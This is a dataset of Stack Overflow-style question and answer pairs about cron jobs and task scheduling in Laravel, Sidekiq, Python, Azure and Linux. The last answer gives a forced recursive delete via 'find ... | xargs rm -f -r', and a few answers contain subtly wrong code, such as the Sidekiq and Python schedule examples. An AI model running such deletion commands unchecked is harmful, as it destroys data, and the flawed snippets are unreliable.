Response
stringlengths
8
2k
Instruction
stringlengths
18
2k
Prompt
stringlengths
14
160
Because sail uses aUbuntu containeryou can follow these instructions:https://serverspace.io/support/help/automate-tasks-with-cron-ubuntu-20-04/Typically they are stored in/var/spool/cron/crontabsso you might want to create a volume to persist them (otherwise they will be removed on the next restart of your container).You can connect to your container withdocker-compose exec laravel.test bashI believe.Supervisord is already installed
I'm using Laravel sail. I want to use supervisor and cronjob. But I don't understand how I can configure these things with sail.I can't find any examples on how to do this.
How can I configure Supervisor and scheduling with Laravel Sail?
I did it without any problems as follows:$ crontab -ethen I set a restart for a container every 5 minutes:*/5 * * * * docker restart <containername>
I have a container that runs under a Root account which I can start using:docker start containernameand I want crontab to start it, so as root I usedcrontab -eand set an entry like this:* * * * * /usr/bin/docker start containernamebut it won't work. I also tried* * * * * root /usr/bin/docker start containernamewith no luck.Anyone has a clue on how I can make this work?
Crontab won't restart Docker container
you could pass in the calculated difference in order to send what sidekiq expectse.g.DateTime.parse("10/20/2014")-DateTime.nowso :delay_interval = DateTime.parse("10/20/2014")-DateTime.now TextWorker.delay_until(delay_interval).perform_async(@user_contact)
I am usinghttps://github.com/mperham/sidekiqgem in a rails app to schedule tasks at a specific date and time.. Ex: Send appointment reminder 10minutes before the appointment schedule time.class TextWorker include Sidekiq::Worker def perform(appointer_id) number = Usermodel.find_by_id(appointer_id).contact Message.create(:from => email, :to => number, :body => 'Thank you...Your appointment is at 10/1/2015 Sun, at 12pm') end endand calling it here in appointments controller:class Appointments_controller def create TextWorker.delay_until(10/20/2014, 13:40).perform_async(@user_contact) enddelay_until doesn't work with specific date/time:Is there any other way to perform a task at a specific date/time in sideqik? if so how? please
rails + sideqik... How to perform a task at a specific date and time
Use a PHP mailer class such asPHPmailerorSwiftMailer, you can send mails directly trough SMTP that way, which will be much faster. And yes sending large quantities of emails is best done via cron so you send X emails every minute. You will avoid server overload that way. If you can't create cron jobs on your server I suggest you switch your hosting provider, otherwise the website you linked is your only viable alternative (but you are depending on some third party this way, which isn't really cool)
I'm preparing a website that will send email notifications to registered users. From my experience I know, that sending emails is somewhat a painful process for PHP, especially when we're talking about thousands. One of my websites sends email every now and then to 1000-1500 people. It takes around 5mins for PHP to accomplish that, so we run it overnight when the server load is the lowest. I'm using nativemail()function without any SMTP. This runs fine on a dedicated server, but I'm not a big fan of this solution.I want to be able to send similar amounts at any time without risking the server going down (and it to be blacklisted).I've read, that ideal solution is to send emails in batches (say of 20) every couple of minutes from a script that's triggered by Cron. This seems to me like a really reasonable idea, but... What if I don't have access to Cron (not all hosting providers give access to it) and website isn't popular enough to be able to trigger the script on page load?I'm insisting on using my server to do the mailing and not any external solution.PS. I found solutions like these:http://www.mywebcron.com/but is this any good?EDITJust to add:I'm using CodeIgniter,rate at which emails are sent from my current server is usually 0.2sec per email.
Opinion on sending emails from php
Here's a possible solution:import datetime def something(): day_of_month = datetime.now().day if (day_of_month > 7 and day_of_month < 15) or day_of_month > 21: return # not first / third monday of month # your code schedule.every().monday.do(something())The scheduler will run every monday, but wereturnif this is not the first / third monday of the month.
Background: I need to run automatic tasks every first and third monday of the month for a server. This should be realised via python not crontab.I found the python module "schedule" but its documentation is not detailed.https://pypi.org/project/schedule/https://schedule.readthedocs.io/en/stable/Does anybody know how to do this?import schedule def TestFunction(): pass schedule.every(1).monday.do(TestFunction) schedule.every(3).monday.do(TestFunction) schedule.run_pending()Will this be executed on the first monday of the year, month or every monday?
Python - Run Job every first Monday of month
The shebang (#!) line of the script should point to the (perlbrew-installed)perlit is meant to run under. (This should be done as part of installing the script.) That's all you need.0 2 * * * /path/to/script arg1 ...
I have tried the following and find it to work. This is done with a non-privileged user. First find out where yourperlcommand is:# which perlThen check the value ofPERL5LIB:# echo $PERL5LIBThen, at the crontab file of the user, do something like:MAILTO=<my email address for the jobs output> HOME=/home/myhome PERL5LIB=/home/myhome/perl5/lib/perl5 0 2 * * * $HOME/<rest of path to perl>/perl $HOME/<path to my perl script> arg1 ...This will run a job at 2am and seems to find all Perl libs correctly. My question is: is this complete andportable? Is there a better way?I have seen a number ofbashandperlscripts out there that are supposed to prepare the environment for the execution of a Perl script, but this seems to suffice. Any advice will be welcome!EDIT: From the comments to the question, it seems that I am using a "bad" mixture of Perlbrew andlocal::lib. The way to make sure libraries get installed inside a particular Perlbrew version is answered here:How do I install CPAN modules while using perlbrew?. Bothcpanandcpanmwill install underPERL5LIBwhen you are usinglocal::libunless you explicitly tell them to do otherwise. Alsocpanmseems to be better suited to working along with Perlbrew.
Running a Perl script from crontab when you use Perlbrew
If you're using PHP, you can figure out both what time is it at your server and in what timezone you're at:echo date('c');It'll output something like:2017-08-15T02:40:09+00:00
I'm using godaddy hosting and running cron job for codeigniter. That will be running every day at 10am. So in cron tab i tried like this00 10 * * * export TZ=Asia/Dhaka; wget http://www.example.com/function 00 10 * * * TZ=Asia/Dhaka; wget http://www.example.com/function 00 10 * * * export TZ=Asia/Dhaka; /usr/bin/curl "http://www.example.com/function"Always those command executing on others timezone maybe UTC timezone but i need Asia/Dhaka timezone UTC +6:00.How do i write correct timezone command and where to write it?Godaddy Cron Tab Look Like this
Godaddy Hosting Cron Job Timezone setting
Run the command daily, and have the script record the date that it last performed a backupWhen it starts up, get the current day of month. If it's the 22nd oh the month, run normally and save the date. If it's >22, and the last run was in the same month, exit. If it's <22, and the last run was the previous month (don't forget to account for wrapping from 12 to 1), exit.The date should be saved in a file somewhere.
I would like to run jobs once a month on, let's say, the 22nd day of the month, on my laptop running Ubuntu 12.04.Since it's a laptop, and I may not always even use it every 22nd day of each month,cronis not a very good option.Looking intoanacron, there seems to be a limitation. Namely, you can specify a 'period', but not a specific day of the week or day of the month, as suggested by theanacrontabfile format:# cat /etc/anacrontab period delay job-identifier command 7 15 test.daily /bin/sh /home/myself/backup.shI would like to be able to say, if we're on the 22nd day of the month, and of course the laptop is running, run the job. If the 22nd is passed and you have not run the job, run it as soon as I boot.I am about to do something ugly, like mixingcronandanacronwith custom scripts or writing my own bash script, using timestamps, probably reinventing the square wheel in the process.Any idea about a best course of action?Cheers.
Run job every month on a specific day (with anacron?)
Please look athttp://thu.openerp.com/open-days-2012/gunicorn.htmlEdit: he references the openerp-cron-worker script, it's currently in the process of being merged into 6.1, check the codehttps://code.launchpad.net/~openerp-dev/openobject-server/6.1-here-comes-the-bogeyman-vmtEdit2: meanwhile the openerp-cron-worker script has landed in lp:openobject-server/6.1 at rev4184 (http://bazaar.launchpad.net/~openerp/openobject-server/6.1/revision/4184)
Is possible to have a more specific configuration for openerp 6.1 and gunicorn? I'm interested to run openerp on wsgi web server and I'm interested to have a more detailed information about the cron task management :) There is poor documentation on the web.
OpenERP and Gunicorn
Sorry, but I don't consider that a good idea.If you're planning on restarting Apache every X minutes, even though it may not need it, I see plenty of downside there but no upside.If you're just checking and restarting when needed, such as with a process running which can detect when a change isneeded,that might be okay.Personally, I wouldn't even do that since I'd rather keep control over deployment changes. For example, if you wanted to get a whole lot of stuff installed during the working day ready for restart but not actually activate it till quiet time.Of course, in a robust environment, you'd be running multiple servers so you could offline them one at a time for changes,withoutaffecting anyone.
I have a server running virtual hosts that get changed quite often. Rather than someone actually going to the server and typing in the apache restart command I was thinking of making a cron (every 1, 5 or 10 minutes, maybe only during working hours, when changes to the virtual hosts are actually made) to restart apache gracefully.sudo apachectl gracefulI found an explanation here on stackoverflow that goes like this:Graceful does not wait for active connections to die before doing a "full restart". It is the same as doing a HUP against the master process. Apache keeps children (processes) with active connections alive, whilst bringing up new children with new configuration (or nicely cleared caches) for each new connection. As the old connections die off, those child processes are killed as well to make way for the new ones.Would this mean that there would be little to no impact on the visitor's experience (long wait times), or should I just stick with manually restarting apache?Thanks!
Would it be considered bad practice to restart apache (with graceful) every 1 / 5 / 10 minutes?
You'd best run a seperate script that runs eternally and watches your database. That way you won't need cron. Nor a massive amount of triggers.But you might want to reconsider your entire question. It's not necessary to actually update the bids every second. You only need to fill in the past x minutes/hours when someone actually points his browser to an auction or makes a manual bid. If it's all autobids you can calculate forwards an backwards with ease.
I have an auction website which let my users place an unlimited amount of autobiddings.To monitor these autobiddings something has to check the database every second.My question is if it is better to use mysql trigger events or to user a cronjob every minute that executes a 60 sec looping php script.If i use the mysql trigger events there will be hundreds of events stacks on eachother, and fired on different times. Is this even possible?? ANd isn't the server load goning to be enourmous. I heard somewhere that the database will be locked while there is a schedueled event. I am using innoDB tables btw.I hope some one can shed some light on this toppic.Regards!
Mysql trigger/events vs Cronjob
Personally, the way I handle errors is to simply send STDERR to a log file, and then periodically check that file. An easy way to do that, is to append 2>/pathtolog to the crontab entry.As far as having duplicates of the same program running, I prefer to have the script attempt to lock something (a file or a local network port). If it fails to obtain that lock, the script does not run. This way, if an existing script is currently running, a new one cannot obtain the identical lock.
A very common need for an application is to run a script every X minutes/hours. Basically its nothing complicated, just some PHP code and a crontab entry.Although I've written quite a few of those cronjobs in the past years I still haven't seen any best practices, at least not that much. As with every "background processing" so many things can go wrong especially in a production settings.Among them:an error occured during execution of the cron and the script died processing half of the datathe cronjob was accidently started twice by another process/by user error/whateverthe cronjob took way longer then expected and the script is called again although its not done processing dataetc.What are some best pratices for writing rock-solid, robust cronjob scripts? Writing a lock file asserting that only one instance runs, extensive logging and monitoring in oder to prevent sending ten thousands of duplicate emails? What are your ideas?
Cronjob – how to do it the right way?
Please see the comments for the full solution.There are multiple approaches to circumvent the 10 minutes rule (which is prevalent in the serverless code) but here's something that can help you. I suggest separating the task into three:A cloud function that close the tab when called.A schedule function that calls it (https://firebase.google.com/docs/functions/schedule-functions)A way to start and stop the schedule function.I am not sure how firebase function work, but I worked with azure functions before and those can be controlled with command line (CLI) or with a sdk for your language of choice. To cancel using the command line, try something like this:firebase functions:delete scheduledFunctionfromHow to cancel a scheduled firebase function?.Now what's left is how to figure out how to start the function, and if it's possible to pass in a parameter to schedule it.Good luck!
I am trying to create an app that simulates opening a tab at a bar. I am running into one issue that I can't seem to figure out - it goes as follows:When someone opens a bar tab, dynamically create a scheduled task that executes code to close the tab after 24 hours.If the tab gets closed before the 24 hours, cancel the scheduled task.If the tab doesn't get closed after 24 hours, execute the code described in step 1 to initiate a payment on the card used to open the tab.I was initially looking into Firebase Functions, and was thinking about using a setTimeout() callable function, but after doing some research I found that Firebase Function's cannot be invoked for longer than 9 minutes.NOTE:I would like this to be dynamic. Meaning, having it account for a variable amount of users. There could be 100 or 1000 users on the platform, each of them needs the ability to have a unique scheduled task for them (sometimes multiple per user).
How to create a dynamically scheduled task?
There is no built in function within SQL server to genrate Next date based on Cron expression. Only way would be, implemeting cron exprssions in C# and genrate it as dll,then regsiter DLL with SQL server CLR.Refernces:https://social.msdn.microsoft.com/Forums/en-US/3e0ebe5a-d452-4893-bcef-0a1e2520c076/convert-cron-expression-to-datetime?forum=transactsqlhttps://github.com/atifaziz/NCrontab/wiki/SQL-Server-Crontab
I have a column that contains a CRON expression that represents how often a user has to perform a task. I would like to build a view that lists the date and things to do for a given user. But I need to calculate my next CRON occurrence in a datetime in T-SQL. How interpreted my expression CRON in SQL?example: column value = [0 30 8 1 *?]I would write: SELECT CrontabSchedule ( '0 30 8 1 *?', GETDATE ()) FROM dbo.UserTasksSomeone has a solution ?
CRON expression to next DateTime with T-SQL on SQL server
There is no easy way in order to distuinguish staging and production environments. If I do remember correctly, you could use the Server Management REST Api to get more details about the current deployment. You just need to get the RoleEnvironment.DeploymentId and communicate with the REST Api by providing a valid X509 Certificate.http://msdn.microsoft.com/en-us/library/windowsazure/ee460806.aspx
I have created an ASP.NET application which is deployed on Azure.Every time whenever I want to publish it on Azure, I make use of a staging server to deploy and after testing everything on staging, I just swap both of them.But there is a problem, I have some startup tasks that create some scheduled tasks for cron jobs. So, these task are also copied to production server from staging and cron jobs are run two times one on production and second in staging. But I want them only to run on production not on staging.How can I prevent this duplicated cron job problem? Please give me some suggestions.
Both production and staging server running same cron in Azure
The last parameter when you're initializing your CronJob indicates that it should execute the job immediately:new CronJob(interval, processDataOnDate(), function() { msg.reply("hello") }, true);That will cause the job to execute immediately, even though your execution date is in the future.See:https://www.npmjs.com/package/cron#api
So, I've got some js code which is a slackbot which supposed to simply listen and parse the date provided, then start a CronJob to run a certain function according to the cron or date format provided. Something like this.var CronJob = require ('cron').CronJob; ... robot.respond(date, function (msg)) { if(!isValidDate(date)) msg.reply("not a valid date); var interval = isCronDate(date) ? date : new Date(date); msg.reply("Job about to be scheduled.") var schedule = new CronJob(interval, processDataOnDate(), function() { msg.reply("hello") }, true); }I've got a coffee file testing this code, and I expect certain responses back, but I do NOT expect the cron job to be executed based on the date I've provided in my test code. However, it is. Is this normal? Does mocha force the code to finish execution due to the fact that this is a unit test, or am I doing something wrong? I am running this to execute my unit test.mocha --compilers coffee:coffee-script/registerFor further information I am running this as a slackbot, so this is all done in the form of 'say' and 'reply.' One of my tests looks like this.beforeEach -> yield @room.user.say 'bob', '@bot schedule at 2017-05-25 18:00:00' expect(@room.messages).to.eql [ ['bob', 'bot schedule at 2017-05-25 18:00:00'] ['bot', 'Job about to be scheduled'] ]The test fails and informs me that the actual result included the message 'hello' from the bot, despite the fact that the date I've provided in my test is in the future.
Node.js CronJob execution when using mocha for testing
Unix and its clones tend to have the concept of the output of one utility program/command becoming the input of the next.In your example the result is (I think) that thenicewill actually affect the niceness of theionice. Only theionicewould have an affect on PHP.(UPDATE: Actually, it should inherit its niceness, see comment)I founda pagethat suggests doing the following to have bothniceandioniceaffect your PHP instance:ionice -c3 -p$$;nice -n 10 /usr/bin/php /path/to/your/script.php
Closed.This question isoff-topic. It is not currently accepting answers.Want to improve this question?Update the questionso it'son-topicfor Stack Overflow.Closed11 years ago.Improve this questionI want to run a script via cron at low I/O and CPU priority. If I understand correctly (and I might not), I could just addproc_nice(10);to my script to lower the CPU priority, but there is no PHP equivalent for I/O priority.There appears to be a shell commandionicefor this, but I am a linux idiot, and I don't know what I am doing. Would this be the correct line for my cron file if I want to use both nice and ionice to lower the priority of the script in question?0 * * * * /usr/bin/nice -n 10 /usr/bin/ionice -c 3 /path/php/bin/php /path/script.phpI got the-c3parameter fromhere("places the process in the idle scheduling class"), and I'm not confident that's what I want.Is there a benefit to using the PHP call toproc_nice()rather than this method?EDIT: my cron script is not running using the above, so I've definitely misunderstood something
how can I lower the CPU and I/O priority of a cron script? [closed]
Do not believe there is anyway to unset it: you might want to just pipe the output of the commands you don't want emailed into/dev/null.
As the documentation forcrontabexplains, ifMAILTOis not set then output goes to the owner of the cron, ifMAILTOis set and not empty, it says where mail should go, and if it is set and empty, no mail is set.Is there any way to unset environment variables likeMAILTOin cron after it has already been set to something? I already tried the obviousunset MAILTOandMAILTO=butcrontab -edoes not accept those.I have a workaround (make sure that everything that I want default mailing behavior comes before the original). However I'm writing a script to write cron jobs, and it would be nice to be able to set/unsetMAILTOwithout having to reorder commands.If it matters, this will be running on a Linux system under Vixie cron.Edit:Clarification. I want jobs to either get mailed to the owner or to a user named in aMAILTO. I don't want the behavior thatMAILTO=''causes where jobs get mailed to nobody at all.
How do you unset MAILTO in crontab?
Not directly answering your question, but proposing another solution:If you want to set up cron jobs for your development environment, it's best to useHomestead, for its Linux standards compliance.For small projects that i develop directly inside macOS, i run the following command inside the project root (in a separate terminal tab) to have my jobs run every minute:while true; do php artisan schedule:run; sleep 60; doneThis helps to make sure, the cron jobs are only run while i'm developing. When i'm done, iCtrl+Cthat command and can be sure nothing unexpected happens while i'm not watching.Plus it gives me the freedom to adjust the interval, by simple choosing another number of seconds for the sleep command. This can save time when developing.Update Laravel 8.xLaravel now offers the above as asingle artisan command:php artisan schedule:work
I have a command scheduled in theLaravel 5.4scheduler and would like to start the Laravel cron onMac OS X El Capitan.app/Console/Kernel.php<?php namespace App\Console; use Illuminate\Console\Scheduling\Schedule; use Illuminate\Foundation\Console\Kernel as ConsoleKernel; class Kernel extends ConsoleKernel { protected $commands = [ 'App\Console\Commands\GetToken' ]; protected function schedule(Schedule $schedule) { $schedule->command('gettoken')->everyMinute(); } protected function commands() { require base_path('routes/console.php'); } }My GetToken.php makes an API call and then a DB change. I believe that this is working properly, as I can run the task directly from the cli using:php/path/to/project/artisan schedule:run 1>> /dev/null 2>&1To edit my cron file I use:env EDITOR=nano crontab -eI then add:* * * * * php /path/to/project/artisan schedule:run >> /dev/null 2>&1I save with ctrl+o and exit with ctrl+x.Re-editing the file shows that the changes have saved.Runningcrontab -lshows the text that I entered into the crontab file.My cron never runs.I can only get it to run once by running manually using the command I mentioned above.
Starting the Laravel cron job on a Mac
Try making a script with the command:script.sh:#!/usr/bin/env sh node /home/campaigns/reporting/UNIT_TESTS/testCron.js > /home/campaigns/reporting/UNIT_TESTS/cron.logand then adding that to cron:*/5 * * * * /path/to/script.shmake sure to make the script executable (chmod +x script.sh)
I have a crontab entry that is supposed to execute a node.js script like this:*/5 * * * * node /home/campaigns/reporting/UNIT_TESTS/testCron.js > /home/campaigns/reporting/UNIT_TESTS/cron.logHowever, it doesn't execute and the log file isn't updated. When I run the script manually, everything works though. Any ideas??Thank you, Igor
Node.js script not executing from crontab
I configured several different operating systems to work with a couple of CRON flavors and RVM.I first triedRVM's officialsolution to the problem but didn't work under FreeBSD and Gentoo. I had to manually add all relevant paths as showed bellow but first typecrontab -ein order to launch the crontab editor[1]:# atmat's crontab configuration SHELL=/bin/bash PATH=/home/atma/.rvm/gems/ruby-1.9.3-p0/bin:/home/atma/.rvm/gems/ruby-1.9.3-p0@global/bin:/home/atma/.rvm/rubies/ruby-1.9.3-p0/bin:/home/atma/.rvm/bin:/usr/local/bin:/usr/bin:/bin:/opt/bin:/usr/i486-pc-linux-gnu/gcc-bin/4.5.3 RUBYLIB=/home/atma/.rvm/rubies/ruby-1.9.3-p0/lib/ruby/1.9.1 GEM_HOME='/home/atma/.rvm/gems/ruby-1.9.3-p0' GEM_PATH='/home/atma/.rvm/gems/ruby-1.9.3-p0:/home/atma/.rvm/gems/ruby-1.9.3-p0@global' RUBYOPT=rubygems %nightly,mail(no) * 8-9 /home/atma/.rvm/rubies/ruby-1.9.3-p0/bin/ruby /usr/local/bin/morula -s username updateThe above example is working under Gentoo GNU/Linux usingfcrona more flexible, beautiful and powerful solution to standard cron, but will work with any cron.[1] This command will opencrontabwith your default system editor.
I'm trying to run a simple ruby script on my old PPC machine running 10.5 in an RVM environment.Searching on SO, I've followed the chosen answer from thispost.This is the line in cron as a result:SHELL=/bin/bash 00 * * * * BASH_ENV=~/.bash_profile && /bin/bash -c '~/deggy/onlineGW.rb'This command runs fine in Bash at the root of the user sam.Here's the salient part of my script:#!/usr/bin/env ruby require 'open-uri' require 'nokogiri' ...Here's the output of the error from cron:X-Cron-Env: <SHELL=/bin/bash> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=sam> X-Cron-Env: <USER=sam> X-Cron-Env: <HOME=/Users/sam> Date: Mon, 6 Jan 2014 03:15:00 -0600 (CST) /Users/sam/deggy/onlineGW.rb:3:in `require': no such file to load -- nokogiri (LoadError)OK, since I'm running RVM I have set my default ruby to 1.9.3 and as I mentioned above, the command executes in Terminal but not in cron. Is there another environment in play?So clearly, there's something I'm overlooking. Help me to see it, sam
Gem not found in Ruby cron job in RVM env
Assuming this is a Linux-like OS,wget -O /dev/null -q http://www.example.com/program/timecheckThe file is the output from wget. This option (-O) tells it to write the output to/dev/null, thus discarding it.
Currently, I have one php function which is running with cron. It's the function to check the timestamp and close the topic. To check the timestamp and make live update, I have to use cron. I run cron with this commandwget -q http://www.example.com/program/timecheckEverything seems working perfectly, so I didn't check my server for quite long. But today, I checked and found out that there are more than 500,000 of files called timecheck are created at root directory.I checked through the code and it's sure that there's no code for creating the file.What I would like to know is, is it because of the wget -q command ? If that's what command should i use to execute the url ?Thanks for your help.With Regards,
Is cron command wget -q create file at server?
On my linux boxcrontab -u userName -l > fileNamelists the crontab file for userName in fileName.Then I would use a ruby (or another language) script to update the file.Finally I would usecrontab -u userName fileNameto update the crontab for userName
I would like to include cron tasks in my Capistrano deployment files instead of using the following command to manually edit the crontab file:crontab -e [username]Is there a script I could use within the Capistrano run command to set the contents of the crontab?
Creating crontab via Capistrano instead of using crontab -e
To call something periodically, seeTimerTask
we need run one function periodically in Java web application . How to call function of some class periodically ? Is there any way that call function when some event occured like high load in server and so on . what is crontab ? Is that work periodically ?
Call function periodically in Java
If you want a task to run on a regular interval as opposed to constantly, you should look into using theTask Scheduler.If you need your code to be a service, but to be "activated" every hour, the easiest approach would be to make your service a COM object and have a simple task scheduled every hour that invokes a jscript/vbscript that creates your COM object and calls simple method on it.The alternative is to use any of the wait APIs to "waste" an hour without consuming cycles.Note that you also have to consider some interesting design decisions that depend on what your scenario is:how is your service going to be started if it crashes or is stopped by the user?if you are started after more than an hour, should you run again or do you need to wait to get on the exact hourly schedule?how do you keep track of the last "activation" time if the timezone or the day-light saving time has changed while you were not active?does your service prevent the computer from going to sleep/hibernate on idling or when the laptop cover is closed? if not, do you need to awake the computer on the hour to get your service working on your schedule?Some of those are taken care of by the task scheduler, so I would strongly recommend going that route vs. waiting for an hour in your code.
I m able to build a windows service and install it.I m curious how can i run this service every hour ? I want it to run every hour periodically.I also need to know the hour range that it s running so that I can store it somewhere.How can i do that?Edit :This service will be installed on many machines, therefore, I dont want to create a scheduled task say on 100 servers.
Windows service that will run every hour
You mixed up the curl php-module and the system executable.Connect to a shell and enter the following:sudo apt-get install curlIf you don't want to installcurltry to usewget.
Closed.This question isoff-topic. It is not currently accepting answers.Want to improve this question?Update the questionso it'son-topicfor Stack Overflow.Closed12 years ago.Improve this questionI'm trying to run this script from the cron job schedule on Ubuntu Linux 10.04.1 server but i get the following out put:Curl seems to be enabled on the serevr this is the extract fro the phpinfo file:The cron script is to clean the log files in a magento dbI have tried various things but just can't get the thing to work ? any ideas would be a great help thank you.
script error on linux ubuntu /bin/sh: curl: not found? [closed]
If you haven't done anything on your system, try looking in/var/log/syslogUse grep to filter/search:grep CRON /var/log/syslogYou can also pipe the output of your cron job to a specific location as well37 13 30 6 * /media/xxx/xxx/bin/python /home/xxx/PycharmProjects/testcron.p >> /var/log/job.log 2>&1
I am absolutely new toubuntuandcron.I want to run some scripts:I edited and saved thecrontabfile:37 13 30 6 * /media/xxx/xxx/bin/python /home/xxx/PycharmProjects/testcron.pytestcron.pycode:print('Hellow World') input('Test Success')I assumed that this would show me if thecronjobran.But no window popped up on the time I set.Can someone point me to how to check if it ran? Did I configure this wrong?
How to check if cronjob ran in ubuntu?
Sorry for waking up a sleeping thread, but as many of the answers no-longer work and I found this page while looking, I figured I'd add my solution here:Create scriptcheck_service.shand setSERVICENAMEas desired:#!/bin/bash SERVICENAME="WHATEVER_SERVICE_YOU_WANT" systemctl is-active --quiet $SERVICENAME STATUS=$? # return value is 0 if running if [[ "$STATUS" -ne "0" ]]; then echo "Service '$SERVICENAME' is not curently running... Starting now..." service $SERVICENAME start fiMake the script executable:chmod +x check_service.shFinally, add the script to Root's crontab by runningsudo crontab -e:# min hour day month dow cmd */1 * * * * /full/path/to/check_service.shSave the crontab, and wait patiently!
I want a 1 liner that can check and restart services, such as Apache if they are inactive/dead.I want to put it in crontab and run it every minute to make sure the service is still running.
Cronjob to check and restart service if dead
You could move your "secret files" into a subfolder, then create a.htaccess filein there that prevents access to that file from everyone, except the server that is running the Cronjob.Example:DENY FROM ALL ALLOW FROM 123.123.123.123If you have shell access you might also put the scripts outside of the accessible folder and run directly via command line or cronjob like this:php script.php.
I am currently working on a new project which involves using CRON jobs.The CRON script basically runs an SQL query, generates the data into a file, and send that file to another server via FTP.The script is on a live website (www.website.com/sendOrders.php)I don't see any security issues or threats, and I think it is highly unlikely that anyone will find the PHP script on the server. However I don't want the script to be executed by any outsiders.Is there a way I can protect this script?Thanks Peter
Can I protect my CRON scripts from remote users?
You may use theTask Queue Python API.
How can I run background tasks on App Engine?
Background tasks on App Engine
You have to set up a singlecronjob that calls the schedule runner every minute:* * * * * php /path/to/artisan schedule:run 1>> /dev/null 2>&1ReadLaravel's Scheduler docsfor more info.
I have made a scheduler. When I call it withphp artisan userRankingit works.This is the code inKernel.php:protected $commands = [ \App\Console\Commands\UserRanking::class, ]; protected function schedule(Schedule $schedule) { $schedule->command('userRanking') ->everyMinute(); }How do I dispatch it so that it runs automatically?
Laravel scheduler is not running automatically
As @Mob said, the sure fire way to achieve this is to put the script in a place where it cannot be accessed through the web server. If this is not possible or you don't want to do it for some reason, you need to detect whether the script was called via a web server or through the command line.My favourite approach for this (there are many) is:$isRunningFromBrowser = !isset($GLOBALS['argv']);This means that if$isRunningFromBrowseris true, you just exit/return an error message/whatever.
Envoirnment : Linux, PHPScenario : I have written a script which will be set as a cron. Now the case is that I want the script to run only through cron and not through any browser (any web browser including mobile browsers). So I am looking for a function something like browserValidate.The script is written in MVC framework and will be run as/usr/bin/GET http://xyz.com/abc/pqrPlease help me with this.Thanks in advance.
PHP Code to stop a script to run from browser
If it's practical you could use shell_exec or include within the first php file to run the second file. If this is placed at the end of the first file, it will only be executed if the script successfully reaches that point, and you can use php code to verify that the first part completed successfully.
How do I set up a cron job (cron2.php) to run after and only after a cron job (cron1.php) runs successfully?
How to run cron job when another cron job finishes?
Let cron start the job one time, the first time. Put the program in an infinite loop, sleep() for 1 second at the end of each loop. like this, in C:int main( int argc, char ** argv ) { while (1) { // do the work sleep(1000); } }Could that work?
How can I run cron every 1 second? there's only minutes option by default
Cron: running cron every 1 second?
You cannot specify store scope for Magento Cron Job, but you can add additional arguments that you can use inside of it.Specify additional node that you can process via your cron method:<crontab> <jobs> <job_name> <schedule> <cron_expr>* * * * * *</cron_expr> </schedule> <run> <model>module/observer::myJob</model> </run> <store>store_code</store> </job_name> </jobs> </crontab>And method where you receiving the schedule object with current job code:public function myJob($schedule) { $jobsRoot = Mage::getConfig()->getNode('crontab/jobs'); $jobConfig = $jobsRoot->{$schedule->getJobCode()}; $yourStoreNode = (string) $jobConfig->store; // Here goes store related functionality }All the store related models can load data only for a particular store, so I hope it solves your problem.
Is there a way to give a store id as parameter when executing a model with cronjob ?
Magento store id in cronjob
Virtualenv's activate script is pretty simple. It mostly sets the path to your virtualenv's Python interpreter; the other stuff that it does (settingPS1, saving old variables, etc.) aren't really necessary if you're not in an interactive shell. So the easiest way is just to launch your Python script with the correct Python interpreter, which can be done in one of two ways:1. Set up your Python script to use your virtualenv's Python interpreterAssuming your virtualenv's interpreter is at~/virtualenv/bin/python, you can put that path at the top of your Python script:#!/home/user/virtualenv/bin/pythonAnd then launch your script from your crontab, as normal.2. Launch the script with the proper Python interpreter in your cronjobAssuming your script is at~/bin/cronjoband your virtualenv's Python interpreter is at~/virtualenv/python, you could put this in your crontab:* * * * * /home/user/virtualenv/python /home/user/bin/cronjob
This question already has answers here:How to set virtualenv for a crontab?(4 answers)Closed10 years ago.how do i call a python script from crontab that requires using activate (source env/bin/active)?
Calling python script from crontab with activate [duplicate]
What about something like this for the "command" part of the crontab :mysqldump --host=HOST --user=USER --password=PASSWORD DATABASE TABLE | gzip > /tmp/table.`date +"\%Y-\%m-\%d"`.gzWhat has changed from OP is the escaping of the date format :date +"\%Y-\%m-\%d"(And I used backticks -- but that should do much of a difference)(Other solution would be to put your original command in a shell-script, and execute this one from the crontab, instead of the command -- would probably be easier to read/write ^^)
I have a crontab set up that errors out every time I attempt to do it. It works fine in the shell. It's the format I'm using when I attempt to automatically insert the date into the filename of the database backup. Does anyone know the syntax I need to use to get cron to let me insert the date into the filename?mysqldump -hServer -uUser -pPassword Table | gzip > /home/directory/backups/table.$(date +"%Y-%m-%d").gzThanks in advance!
Proper format for a mysqldump dynamic filename in a cron?
You probably have something like apublic_htmldirectory, in which you have all the phps. Just put it outside of that directory.
I have this script.php file which i want to run as a cron job on my linux/apache server.However, i do not want public to access www.mycompanyname.com/script.php and also run the script concurrently.How can we prevent that? How can we restrict the script to the server's access only? Is it using chmod or setting something inside .htaccess file, something along the line?Any advice ?
Run a script.php on cron job on linux/apache server but restrict public access to the php file
First one is easy.12 9 * * 1-5 <full_path>/job1.phpSecond one is tricky. I split that into 3 entries.15-59 9 * * 1-5 <full_path>/job2.php * 10-14 * * 1-5 <full_path>/job2.php 0-30 15 * * 1-5 <full_path>/job2.phpCron Syntax* * * * * command to be executed ┬ ┬ ┬ ┬ ┬ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ └───── day of week (0 - 6) (0 is Sunday, or use names) β”‚ β”‚ β”‚ └────────── month (1 - 12) β”‚ β”‚ └─────────────── day of month (1 - 31) β”‚ └──────────────────── hour (0 - 23) └───────────────────────── min (0 - 59)
I have to run two cron jobs for the following scenarios.job1.php Should run once in a day at 9:12 AM on Monday to Friday. (five days in a week)job2.php Should run in each minutes from 9:15 AM to 3:30 PM on Monday to Friday. (five days in a week)I have another 4 cron jobs which needs to be implemented in my project. But all that can be derived from the above two scenarios.
cron job to run each minutes from monday to friday from 9:15AM to 3:30PM
To delete directories in /TBD older than 1 day:find /TBD -mtime +1 -type d | xargs rm -f -r
